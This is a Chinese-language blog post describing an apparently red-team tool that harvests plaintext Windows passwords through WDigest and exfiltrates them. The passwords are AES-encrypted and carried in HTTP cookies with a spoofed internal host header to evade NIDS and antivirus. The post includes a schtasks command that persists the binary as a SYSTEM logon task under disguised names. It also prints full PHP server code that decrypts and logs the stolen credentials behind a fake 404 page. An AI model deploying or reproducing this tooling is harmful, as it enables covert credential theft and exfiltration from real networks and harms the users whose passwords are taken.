获取wdigest明文密码加密传输至远程服务器

该工具是去年内部红蓝对抗项目做的一个工具,目的是绕过NIDS\杀毒软件等安全防御策略收集内部所有公用机器登录的用户密码

  1. 修改注册表实现记录明文密码
  2. 通过Windows原生http方式将密码通过aes加密传送至远程服务器,体积小
  3. 服务端解密
  4. 加密后的密码通过cookie传输,使流量看起来正常
  5. http 中host 为内网存在域名,流量设备看到的也是正常应用请求,不易被发现
  6. 支持1903及常见系统 (@Tiger),想支持更多系统请参照mimikatz自行添加

使用前请修改 服务端及客户端aes密钥,接收地址,伪装host信息

程序执行一次就退出,多用户登录电脑
可以用计划任务配置成用户登录运行,并以系统权限启动。

1
schtasks.exe /create /ru "SYSTEM" /tn "DLP-update" /sc ONLOGON /tr "c:\windows\IT-backup.exe" /F
  • 项目地址:https://github.com/mabangde/mimiremote
  • 核心代码来自:https://blog.xpnsec.com/exploring-mimikatz-part-1/

仅用作安全研究,请勿非法用途

  • 流量信息:
    2020-05-12-13-18-24

  • 截获密码:
    2020-05-12-13-17-35

服务端接受解密代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
class AesWithOpenssl
{
public static $key; // 秘钥
public static $iv; // 偏移量

public function __construct()
{
self::$key = 'ooo00iiiIIIlllii';
self::$iv = 'zzzzZZZZTTTTLLLL';
}

public function encryptWithOpenssl($data = '')
{
return base64_encode(openssl_encrypt($data, "AES-128-CBC", self::$key, OPENSSL_RAW_DATA, self::$iv));
}

public function decryptWithOpenssl($data = '')
{

return openssl_decrypt(base64_decode($data), "AES-128-CBC", self::$key, OPENSSL_RAW_DATA, self::$iv);
}
}


//$str="admin888";
$obj = new AesWithOpenssl();
$token=$_COOKIE['Token'];
if(isset($token))
{
// echo $token;
$decrypt_token=$obj->decryptWithOpenssl($token);
//echo $decrypt_token.PHP_EOL;
file_put_contents('./loger/webinfo.log',$decrypt_token,FILE_APPEND);
echo "Good!";
}else{
header("HTTP/1.0 404 Not Found");
echo
'<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>';

}